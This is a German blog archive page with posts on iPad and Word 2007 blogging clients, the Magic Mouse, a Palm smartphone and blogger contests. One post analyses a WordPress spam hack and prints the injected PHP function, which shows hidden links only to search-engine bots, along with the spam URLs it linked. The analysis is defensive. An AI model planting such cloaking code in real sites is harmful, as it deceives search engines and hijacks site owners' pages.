Test der Blogsys App mit WordPress auf dem Ipad 2

Wpid-Photo-23 11 2011-2010 in Dieser Artikel ist mit der Blogging App Blogsys für das Ipad erstellt worden. Das Design ist sehr übersichtlich und die wichtigsten Mediendienste, wie Flickr, Youtube, Picssa und Google sind integriert. Man kann sich direkt mit seinen Blogdaten einloggen und sofort loslegen. Natürlich kann man auch Bilder und Videos direkt vom Ipad auf seinen Blog hochladen. bequem per Drag & Drop. Die App ist sehr viel funktionaler als die hauseigene WordPress App. Das Bilder Handling ist einwandfrei. Auch der visuelle Editor funktioniert sehr gut. Leider fügt der Editor komischen Html-Code und Css mit apple-webkit Anweisungen in den Quellcode. Das ist ziemlich lästig. Schade schade. sonst sehr gut.
 

 

Da dies eigentlich nur ein Testartikel werden sollte und kein komplettes Review mache ich an dieser Stelle Schluss mit einem sehr positivien Eindruck von dieser App. Sie ist leider nicht kostenlos, sondern muss für 3,99€ im Appstore erstanden werden. Wie ich finde ein vertretbarer Preis.

 

Der Artikel wurde auf 20:00 Uhr geplant. Mal sehen, ob er auch pünktlich veröffentlicht wird.

[UPDATE]

Leider hat die App eine komische Schriftart im Blogposting verwendet. Dadurch sah der Artikel etwas komisch aus. Zudem verursacht er teilweise unnötiges HTML. Zudem wurden unnötige Absätze in das Posting eingefügt. Dennoch hat die Veröffentlichung sehr gut geklappt.

[FAZIT]
Das Fazit schreibe ich dann doch lieber im Backend von WordPress. Die App funktioniert sehr gut. Das einzige Ärgernis sind die HTML-Einstreuungen vom apple-webkit und die unnötigen Absätze. Ich hoffe hier wird nochmal nachgebessert, da solche Kleinigekeiten ziemlich ärgerlich sind. Dadruch muss man den Artikel doch leider nochmal im eigenen Backend anfassen und nachjustieren. Das gibt leider einen fetten Punkt Abzug.

 

Blog Publishing mit dem Ipad2 und der WordPress Applikation

Heute testen wir mal die Blogfunktionalität über das IPad 2 mit der IPad Applikation von WordPress.

Bilder hochladen:

20110507-002345 in

Videos produzieren:

Das Schreiben funktioniert im HTML-Modus, es sind lediglich die Schaltflächen zum Veröffentlichen, sowie Medien zum Upload verfügbar.

20110507-121742 in

20110507-121804 in

20110507-121824 in

20110507-121901 in

20110507-121937 in

20110507-122018 in

Fazit:
Das Bloggen über das IPad funktioniert. Die Grundfunktionalitäten sind vorhanden. Leider ist die App ein paar mal abgestürzt und ich würde mir wünschen, dass man Bilder drehen kann. Da das im Moment noch nicht möglich ist empfehlen wir Fotos immer im Hochformat zu produzieren.

Dieses Posting wurde ausschließlich über das IPad 2 geschrieben.

 

Berührungsempfindlich: Apple Magic Mouse mit Multitouch

Apple-magic-mouse-mac in
Apple bringt das Multitouch-System jetzt auch auf den Mac, jedoch nicht auf den Bildschirm, sondern integriert es in die Maus:

Den Anfang machte das iPhone. Dann kam der iPod touch. Und dann das MacBook Pro. Intuitiv, intelligent, dynamisch. Multi-Touch führte eine völlig neue Möglichkeit ein, mit tragbaren Geräten zu interagieren: mit Gesten und Fingerbewegungen. Jetzt kommt die nächste große Innovation: Wir bringen der Maus Gesten bei. So kommt jetzt eine Maus auf den Schreibtisch, die mit nichts vergleichbar ist. Die Magic Mouse. Die erste Multi-Touch-Maus der Welt. Sie kommt standardmäßig mit jedem neuen iMac, aber du kannst sie natürlich auch zu jedem Bluetooth fähigen Mac hinzufügen.

(via Apple)

Seht selbst, wie intutiv die Magic Mouse zu bedienen ist:

Apple Magic Mouse

Mausgesten mit der neuen Apple Maus:
Magic-maus-gesten in

Super Design und tolle Umsetzung. Apple schafft es wieder einmal mit einer sanften Revolution die Nutzer auf die nächste Generation der Interfaces zwischen Mensch und Computer einszustimmen.

Logitech MX Air Freespace
Ich nutze übrigends die Logitech MX Air Maus Freespace, welche bereits einen Berührungsempfindlichen Sensor für das Scrollen besitzt. Die Maus kann jedoch auch in der Luft verwendet werden, das kann die Apple Maus nicht.

Logitech-mx-air-freespace-maus in
(via logitech)

Ich bin mit der Maus sehr zufrieden. Nur leider ist der Scrolling-Sensor zu empfindlich und leider noch nicht so ausgereift, wie der von Apple. Für Präsentationen aber meine erste Wahl.

 

eDarling Slogang Contest: Mit Persönlichkeit verlieben.

Edarling-slogan-contest in

eDarling hat eine neue Aktion für speziell Blogger ins Leben gerufen.

Die Partnerbörse eDarling sucht einen neuen Slogan für Ihre Partnervermittlungsagentur und hat aus diesem Grund eine innovative Kampagne gestartet. Frei nach dem Crowdsourcing Prinzip soll nun die Community selber den Slogan vorschlagen. Der beste Slogan wird von einer Jury ausgewählt und gewinnt den Hauptpreis von 1.000 €.

Mitmachen kann jeder, der eine Website oder Blog besitzt und auf die Aktion verlinkt.

Erfreut hat mich auch die persönliche Ansprache per Email mit Hinweis auf den Contest:

Hallo Herr Schröder,

wir haben gesehen, dass Sie mit http://www.mediengestalter-weblog.de auf http://www.mitstil.com/blogger-aktion-preise-im-wert-von-ueber-1700-euro/ teilgenommen haben. Wir haben eine spannende Aktion, von der wir überzeugt sind, dass auch Sie Interesse haben könnten.

eDarling ist ein junges Unternehmen im Bereich Online Dating und sucht einen neuen Slogan! Mittels Crowdsourcing – der gebündelten Intelligenz der Massen – setzen wir dabei auch auf Ihre Kreativität! Schlagen Sie uns einen neuen Slogan vor – wie Sie mitmachen können, erfahren Sie auf http://slogan.edarling.de

Sehr angenehm und unaufdringlich wurden anscheid einige Blogger mit einer persönlichen Nachricht angeschrieben – da lass ich mich nicht zwei Mal bitten – besonders, da es auch etwas zu gewinnen gibt.

Die Preise:

1. Der Gewinner erhält 1.000 € für den besten Slogan.

2. Unter allen Teilnehmern werden 1.000 € verlost.

3.  Das Blog mit den meisten Verweisen auf das Gewinnspiel bekommt 250 €.

Für mich besonders Interessant der Punkt 3, daher würde ich mich freuen – solltet ihr auch an dem Contest teilnehmen wollen – wenn ihr mich als Quelle in dem Beitrag erwähnen könntet. Ist natürlich nur eine Bitte 😉

Edarling-mit-persoenlichkeit-verlieben in

Meine Vorschläge:

1.) eDarling – Mit Persönlichkeit verlieben.

2.) eDarling – Liebe ist Persönlichkeit.

3.)  eDarling – Mit Persönlichkeit den idealen Partner finden.

Auf der Grundlage eines wissenschaftlich fundierten Persönlichkeitstests schlägt eDarling die besten Partner vor und erhöht somit die Erfolgsquote um ein vielfaches. Ich finde das einen sehr interessanten Ansatz und bin der Meinung, dass dies eine viel versprechendes Erfolgskonzept ist. Zudem ist die kritische Masse an angemeldeten Nutzern durch massiver Fernsehwerbung auf Prosieben, Sat1, N24 und Kabel1 bereits vorhanden. Ich bin gespannt, wie sich eDarling neben den Platzhirsch neu.de durchsetzen wird, gerade weil eDarling auf den Highquality-&Trust-Faktor der Mitglieder setzt.

Qualität statt Quantität

Interessant ist besonders die Männer-Frauen-Quote: Diese ist derzeit mit Frauen (53%) und Männern (47%) relativ ausgeglichen. Was daran liegen könnte, dass alle Profile von Hand geprüft werden und keine Fakeprofile vorhanden sind.

Über eDarling:

eDarling ist eine Online-Partneragentur mit Sitz in Berlin. Das Online-Unternehmen bringt über einen wissenschaftlich fundierten Persönlichkeitstest und ein innovatives System der Partnervermittlung Menschen zusammen, die auf der Suche nach dem richtigen Partner und einer dauerhaft erfüllten Beziehung sind. Durch einen innovativen Datenabgleich wird ein personenbezogenes Analyseverfahren unter tausenden von Mitgliedern angewendet, das auch individuelle Suchmuster berücksichtigt. Auf dieser Grundlage werden den Mitgliedern die optimal passenden Partner vorgestellt. eDarling ist eine Marke der Affinitas GmbH mit Sitz in Berlin und wird durch die Rocket Internet GmbH unterstützt.

 

Das Treo Pro von Palm aus der Bloggeraktion von mitstil.com

Palm-treo-pro in

Bei der Bloggeraktion von mitstil.com gibt es als Hauptpreis ein Smartphone – genauer gesagt das „Treo Pro“ von Palm. Ein sehr stilvolles Handy – nein was sag ich – es ist mehr als nur ein Handy, es ist eigentlich ein Hochleistungsrechner im Taschenformat. Die Funktionsliste ließt sich wie ein Orgasmus der neuesten Technologien in eine Streichholzschachtel gesteckt.

Funktionen des Palm Treo Pro im Überblick

– Windows Mobile® 6.1 Professional
– Qualcomm® MSM7201 400 MHz
– Transflektiver TFT-Farb-Touchscreen (320 x 320)
– HSDPA/UMTS/EDGE/GPRS/GSM-Funktechnologie
– Tri-Band UMTS – 850 MHz, 1900 MHz, 2100 MHz
– Quad-Band GSM – 850/900/1800/1900
– 802.11b/g mit WPA-, WPA2- und 801.1.x-Authentisierung
– GPS integriert
– Version: 2.0 + Enhanced Data Rate
– 256 MB Speicher (100 MB verfügbar), 128 MB RAM
– 2,0 Megapixel, bis zu 8-facher Digitalzoom und Videofunktion
– Austauschbarer Lithium-Ionen-Akku (1500 mAh) mit
– bis zu 5 Stunden Sprechzeit und bis zu 250 Stunden Standby
– microSDHC-Karte (unterstützt bis zu 32 GB)
– MicroUSB 2.0 zum Synchronisieren und Aufladen
– 3,5-mm-Stereo-Headset-Anschluss
– 60 x 114 x 13,5 mm (B x L x T);

Das kleine Schwarze, passend zu jedem Anlass wiegt nur unglaubliche 133 Gramm. Für eine Hochleistungsrechenmaschine schon ein kleines Wunder.

Das Treo Pro smartphone by Palm ist eine perfekte Kombination aus E-Mail-Funktionen, Wi-Fi und GPS. Die Komplett – Tastatur und der große Farb – Touchscreen ermöglichen eine völlig unkomplizierte Bedienung. Bei diesem schlanken und eleganten Smartphone müssen Sie keinesfalls auf eine hohe Akkuleistung verzichten – es ist jederzeit und überall einsatzbereit.

Fazit von tecchannel
Der Treo Pro ist in jedem Fall ein aktuelles Smartphone, das locker mit anderen Windows-Mobile-Geräten mithalten kann. Palm steckt den Neuzugang in eine solide Hülle, insgesamt wirkt das Gerät sehr wertig. Bei der Tastatur muss man zwar gegenüber dem Vorgänger leichte Abstriche machen, dennoch ist sie immer noch gut. Das Display ist hell, Inhalte sind gut zu erkennen.

Mehr Informationen und meinen Beitrag zu der Bloggeraktion von mitstil.com findet ihr hier.

 

Breaking News – Best of Dreamgirls auf mitstil.com

Wenn das kein Stil hat? Eine Hommage an die Bloggosphere, ehrt mitstil alle Blogger mit einer Aktion in der alle Blogger, die über mitstil schreiben an einer Verlosung von stilvollen Preisen teilnehmen. Der kreativste Beitrag gewinnt das Palm.

Best of Dreamgirls auf mitstil.com

Etwas fürs Auge
Und da es bei der Aktion auch um Kreativität geht und ich mit diesem Beitrag auch etwas fürs Auge bieten möchte, habe ich ein „Best of Traumfrauen mitstil“ erstellt. Diese Frauen sind eigentlich viel zu schade um sie sich übers Sofa zu hängen. Die Bilder sind exklusiv aus der Rubrik Traumfrauen von mitstil.com zusammengestellt.

mitstil (ja man schreibt es auch am Satzanfang klein) ist ein junges online Magazin für Männer, die Wert auf Lifestyle und Stil im Leben legen. Die Betreiber Axel Dittmann und Julius Koroll schreiben zu Ihrem neuen Projekt für die Männerwelt:

Ein Magazin ist wie ein geschüttelter Martini: Es gehört in die Hände von Gentlemen. mitstil.com ist wie das Bestellen eines leckeren Martinis in einem High-Class Kasino. Mein Tisch-Nachbar spielt Roulette, krempelt seinen Boss-Blazer zurück. Das ist unser Leben. Wo ist meine Rolex? Das Blackberry erinnert: Morgen geht’s nach Madrid. Oder New York? Schatz, hast du die Koffer gepackt? Uns geht es gut. Denn Sie wissen nicht was sie tun. Kein Stress. Ästhetik. mitstil.com ist wie ein Campari Orange bei einer guten Zigarre. Es geht um Genuss. Also bestellen wir! Nicht warten.

Hört sich verdammt gut an, nur ist das für die meisten wohl eher eine Traumvorstellung als tägliche Realität. Aber darum geht es ja auch nicht – also lasst uns träumen und die stilvolle Welt der kleinen und großen Spielzeuge für Männer genießen.

Breaking News – Gewinne im Gesamtwert von 1.700 €

Das nenne ich ein gelungenes Portfolio an stilvollen Preisen. Die kabellosen Stereo Lautsprecher von Sony sind sehr stylisch. Das Palm ist natürlich der Knaller – ich spiele schon lange mit dem Gedanken mir ein Palm zu besorgen – hat leider auch seinen Preis.

Die offizielle „Teilnehmerkarte“ ist dieser BannerMitstil Bloggeraktion in

Ich bin gespannt, wie sich das noch sehr junge Magazin in den nächsten Monaten entwickeln wird und wünsche den Gründern viel Erfolg!

 

Mediengestalter Blog gehackt und keiner hats gemerkt (WordPress Exploit)

Google-search-results-cloaking-wordpress-exploit-300x87 in

Der Mediengestalter-Weblog wurde durch einen fiesen Exploit von WordPress gehackt. Die Sicherheitslücke wurde von mir geschlossen leider aber sind mir durch diesen Hack die Suchmaschinenpositionen abgeraucht. Es handelt sich um ein Spam-Hack, der mir in den Footer diverse unsichtbare Links einfügte. Das besonders hinterlistige war allerdings, dass die Links ausschließlich für den Googlebot sichtbar waren und somit kaum gefunden werden konnten. Zusätzlich wurde mit CSS der Content mit display:none ausgeblendet. Die einfachste Möglichkeit den Spam zu entdecken ist sich den Google-Cache in Text-Version anzuschauen.

site:www.mediengestalter-weblog.de

Cloaking-footer-text-300x73 in

Eine weitere Methode den Spam zu entdecken, ist sich bei den Google Webmaster Tools anzumelden.

Google Webmaster Tools

Stutzig wurde ich, als ich gesehen habe, dass sich mein Blog laut Google Webmaster-Tools hauptsächlich mit dem Thema Viagra, Herbal oder Generic befassen soll.

Google-webmaster-tools-content-exploit-300x185 in

Ich kann jedem nur raten seine WordPress Version immer auf dem aktuellsten Stand zu halten. Die Cracker werden immer einfallsreicher und hinterlistiger. Somit konnte ich leider auch nicht heraus finden wer hinter dieser Attacke stand.

Bewerbung um eine Reinclusion bei Google

Ich werde heute noch einen Reinclusion Request bei Google starten.

Hier der Link unter dem man einen Reinclusion Request starten kann.

Footer Spam HTML


<div id="_wp_footer">
...
Über 300 Spam Links
...
</div>

Verlinkt wurde z.B. auf

http://itp.nyu.edu/%7Eja771/emp/index.php?catid=3710
http://web.honorscollege.cuny.edu/seminars/liu07/?ucla=300
http://web.honorscollege.cuny.edu/seminars/liu07/?ucla=466

Anhang

Den Linux by Examples Blog hat es auch erwischt. Hier konnte bisher auch keiner herausfinden, wer hinter diesen Hack steht.

Who is behind this?
Seriously We don’t know, but based on what we have, we make some guess, feel free to give yours.

From the spam injection, we observed that the spam links appended with a modified google adsense script with key pub-7652328300112263. Who’s key is that? Do he steal your income as well as messing your google index? Only google adsense team would able to answer this.

Tipp Google Bot Simulator:

Wer seine Seite nach unerwünschten Spam im Google-Index durchsuchen möchte, kann über den Google-Bot-Simulator seine Seite ansehen, wie sie der Googlebot sieht.

Wie wird man den Spam Hack wieder los?

Das ist leider nicht so einfach, da sich der Hack tief ins System frisst und nahezu überall seine Dateien hinterlegen kann. Daher empfehle ich eine komplett Neuinstallation von WordPress mit der aktuellsten Version. Dabei sollten alle bisher verwendeten Plugins gelöscht werden und neuinstalliert werden, da auch dort der Hack sein Unwesen getrieben haben kann.

Infizierte Orte können sein:

/wp-content/uploads
/wp-content/plugins
/wp-content/themes
/wp-includes
/wp-admin
/ etc...

Mit einigen Stunden Suche habe ich als einzigen Hinweis noch die Funktion „echo123“ entdeckt, welche über die WordPress-Funktion add_action() hinzugefügt wird.

add_action('wp_footer','wpc7c16b8466d864eeefd20050625c7775');
function
wpc7c16b8466d864eeefd20050625c7775() {
$seau=array("google","yahoo","slurp","msn","live","ask","altavista","aol");
$sebot=""; foreach($seau as $ua) if(strpos(strtolower($_SERVER['HTTP_USER_AGENT']),$ua)!==false){ $sebot="1"; break; }
if(!(
$sebot==1 && sizeof($_COOKIE)==0)) return;
@include(
'./wp-includes/class-mail.php');
if(
sizeof($wparr)>0){
echo
"<div id=\"_wp_footer\">";
foreach(
$wparr as $k=>$v){
echo
"<a href=\"".$v['url']."\" title=\"".ucwords($v['key'])."\">".ucwords($v['key'])."</a>\n";
if(
$i++==$inum) break;
}
echo
"</div>".$_footer;
}
}

Quellen und Tips zu diesem WordPress Link Spam Exploit:

http://www.village-idiot.org
http://technorati.com
http://googlewebmastercentral.blogspot.com
http://blogsecurity.net
http://playground.ebiene.de
http://www.teohuiming.name
http://www.prefblog.com

 

Word 2007 als Blog-Client (2. Teil)

Ich habe nun meinen ersten Blogbeitrag per Microsoft Office Word 2007 erstellt.

Bis auf ein paar kleine Kinderkrankheiten funktioniert das Bloggen über Word ganz Gut.

011907 0920 Word2007als1 in

Nach dem Klicken auf das „Veröffentlichen“-Symbol kam der Dialog „Blogdienstanbieter kontaktieren“. Leider blieb dieser auch, sodass ich irgendwann auf „Abbrechen“ klicken musste.

Danach kam die Mitteilung, dass der Blogbeitrag nicht veröffentlicht wurde. Was jedoch nicht korrekt war, denn der Blogbeitrag wurde in voller Pracht auf meinem Blog angezeigt.

Der Quelltext ist überraschend sauber und mit inline CSS und <p>-Elementen formatiert. Vom ersten Eindruck scheint Word konformes XHTML zu generieren.

011907 0920 Word2007als2 in

Möchte man einen bereits existierenden Blogbeitrag editieren, werden leider keine Bilder angezeigt. Das finde ich extrem nervig, da man damit nicht mehr den Gesamteindruck seines Beitrags erkennen kann.

011907 0920 Word2007als3 in

Und beim Editieren kam dann auch leider irgendwann dieser Fehler. Das Dokument konnte aber wiederhergestellt werden.

011907 0920 Word2007als4 in

Fazit:

Solide Funktionen aber leider noch nicht 100% ausgereift. Ich werde meinen Blog mal auf den neuesten Stand

Bringen und euch in einem dritten Teil ein Schluss-Fazit geben.